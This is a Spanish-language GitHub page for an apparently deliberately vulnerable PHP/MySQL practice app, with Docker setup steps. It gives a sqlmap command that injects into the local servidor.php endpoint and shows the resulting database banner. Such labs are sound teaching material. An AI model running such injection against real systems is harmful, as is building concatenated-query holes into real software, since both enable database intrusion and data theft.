SQL Injection

Descargar y Montar el servidor desde Docker usando un volumen con el Codigo Fuente de Github para editarlo:

git clone https://github.com/IngenieroRicardo/SQLInjection
docker pull ghcr.io/ingenieroricardo/sqlinjection:latest
docker run --publish 8080:80 -v ./SQLInjection:/app ghcr.io/ingenieroricardo/sqlinjection:latest

Al tener las variables concatenadas puedes hacer inyeccion SQL:

sqlmap -u "http://127.0.0.1:8080/servidor.php?nombre=yo&mensaje=hola" -b

5.5.62-0ubuntu0.14.04.1-log
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.62-0ubuntu0.14.04.1-log'

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
README.md		README.md
cliente.js		cliente.js
database.sql		database.sql
estilos.css		estilos.css
index.html		index.html
marco.png		marco.png
servidor.php		servidor.php

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

SQL Injection

About

Packages

Contributors 2

Languages

IngenieroRicardo/SQLInjection

Folders and files

Latest commit

History

Repository files navigation

SQL Injection

About

Resources

Stars

Watchers

Forks

Packages 0

Contributors 2

Languages

Packages